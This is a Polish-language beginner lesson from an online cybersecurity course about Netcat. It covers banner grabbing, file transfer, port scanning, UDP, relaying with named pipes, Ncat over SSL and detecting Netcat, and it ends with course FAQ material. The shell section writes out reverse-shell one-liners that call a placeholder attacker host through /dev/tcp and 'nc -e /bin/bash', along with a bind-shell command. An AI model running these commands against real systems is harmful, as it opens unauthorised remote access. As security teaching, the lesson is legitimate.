0Pricing
Cyber Security Academy · Lekcja

Netcat: szwajcarski scyzoryk

Wykorzystają Państwo nc do pobierania bannerów, przesyłania plików, przekierowywania portów i tworzenia prostych powłok zwrotnych.

Netcat: szwajcarski scyzoryk to bezpłatna lekcja Cyber Security Academy na CoddyKit. To lekcja 3 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Cyber Security Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.

Czym jest Netcat

Netcat (nc) to narzędzie, które odczytuje i zapisuje dane za pośrednictwem połączeń sieciowych TCP lub UDP. Jest zainstalowane niemal w każdym systemie uniksowym i jest niezwykle przydatne do debugowania, przesyłania plików oraz podstawowego wykorzystywania luk.

Podstawowe nawiązywanie połączenia i pobieranie banera

Połącz się z dowolnym portem TCP, aby pobrać baner usługi i ręcznie komunikować się z protokołem. To najprostsza forma rozpoznania.

# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]

# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTP

Nasłuchiwanie na porcie

Netcat może nasłuchiwać połączeń przychodzących za pomocą -l -p. Jest to przydatne do testowania łączności, przechwytywania powłok zwrotnych i odbierania plików.

# Listen on port 4444
nc -lvnp 4444

# -l listen
# -v verbose
# -n no DNS resolution
# -p port number

Przesyłanie plików za pomocą Netcat

Netcat może wysyłać pliki przez przekierowanie ich do połączenia. Odbiorca nasłuchuje i przekierowuje dane wyjściowe do pliku. Brak szyfrowania — używaj wyłącznie w zaufanych sieciach.

# Receiver (runs first):
nc -lvnp 4444 > received_file.txt

# Sender:
nc 192.168.1.10 4444 < file_to_send.txt

Skanowanie portów za pomocą Netcat

Netcat umożliwia podstawowe skanowanie portów za pomocą -z (tryb bez wejścia/wyjścia) i -w (limit czasu). Jest wolniejszy od Nmapa, ale przydatny, gdy Nmap jest niedostępny.

# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded

# With timeout:
nc -zvw2 192.168.1.100 22 80 443

Prosta powłoka zwrotna

Powłoka zwrotna powoduje, że cel łączy się z powrotem z atakującym. Jest przydatna podczas testów penetracyjnych, gdy reguły zapory blokują połączenia przychodzące do celu.

# Attacker listens:
nc -lvnp 4444

# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1

# Or via nc:
nc attacker_ip 4444 -e /bin/bash

Powłoka bind

Powłoka bind nasłuchuje na komputerze celu. Atakujący łączy się z tą powłoką. Jest rzadziej używana we współczesnych testach penetracyjnych, ponieważ zapory zwykle blokują połączenia przychodzące.

# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash

# On attacker: connect
nc target_ip 5555

Tryb UDP

Użyj -u do nawiązywania połączeń UDP. Jest to przydatne do testowania usług UDP, takich jak DNS (port 53) i SNMP (port 161).

# Test DNS over UDP
nc -u 8.8.8.8 53

# Test SNMP
nc -u 192.168.1.1 161

Pośredniczenie za pomocą Netcat

Netcat może łączyć połączenia w łańcuch, aby umożliwić przechodzenie między sieciami. W połączeniu z potokami nazwanymi (mkfifo) tworzy proste tunele dwukierunkowe bez dodatkowych narzędzi.

mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipe

Ncat: nowoczesna alternatywa

Ncat (część Nmapa) rozszerza Netcat o obsługę SSL (--ssl), kontrolę dostępu i tryb pośrednika. W przypadku szyfrowanych kanałów należy preferować Ncat.

# SSL listener
ncat --ssl -lvnp 4444

# SSL connect
ncat --ssl target_ip 4444

Obrońcy: wykrywanie Netcat

Połączenia Netcat wyglądają jak zwykły ruch TCP. Obrońcy wykrywają je przez monitorowanie nazw procesów (HIDS), nietypowych portów wychodzących oraz powłok uruchomionych przez nieoczekiwane procesy nadrzędne.

Szybki test

Jaka flaga Netcat włącza tryb nasłuchiwania?

Podsumowanie: Netcat

Netcat to podstawowe narzędzie: używaj go do pobierania banerów, przesyłania plików, testowania łączności oraz poznawania mechanizmów powłok zwrotnych i bind. W autoryzowanych testach penetracyjnych służy do weryfikowania reguł zapory i symulowania przemieszczania się atakującego w sieci. Należy dobrze je znać — zarówno po to, aby go używać, jak i aby go wykrywać.

Często zadawane pytania

Czy lekcja „Netcat: szwajcarski scyzoryk” jest bezpłatna?

Tak — pełny tekst „Netcat: szwajcarski scyzoryk” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Cyber Security Academy, przejdź na CoddyKit PRO. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.

Co nauczysz się w „Netcat: szwajcarski scyzoryk”?

Wykorzystają Państwo nc do pobierania bannerów, przesyłania plików, przekierowywania portów i tworzenia prostych powłok zwrotnych. Ćwiczysz Cyber Security Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.

Czy potrzebuję doświadczenia, aby zacząć Cyber Security Academy?

Nie wymagamy żadnego doświadczenia. Cyber Security Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 3 z 4.

Ile czasu zajmuje lekcja „Netcat: szwajcarski scyzoryk”?

Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.

Czy mogę pisać i uruchamiać kod w tej lekcji Cyber Security Academy?

Tak. Każda lekcja Cyber Security Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.

Wszystkie lekcje w tym kursie

  1. Techniki skanowania portów w Nmap
  2. Rozpoznawanie usług i systemów operacyjnych
  3. Netcat: szwajcarski scyzoryk
  4. Skrypty do enumeracji sieci
← Powrót do Cyber Security Academy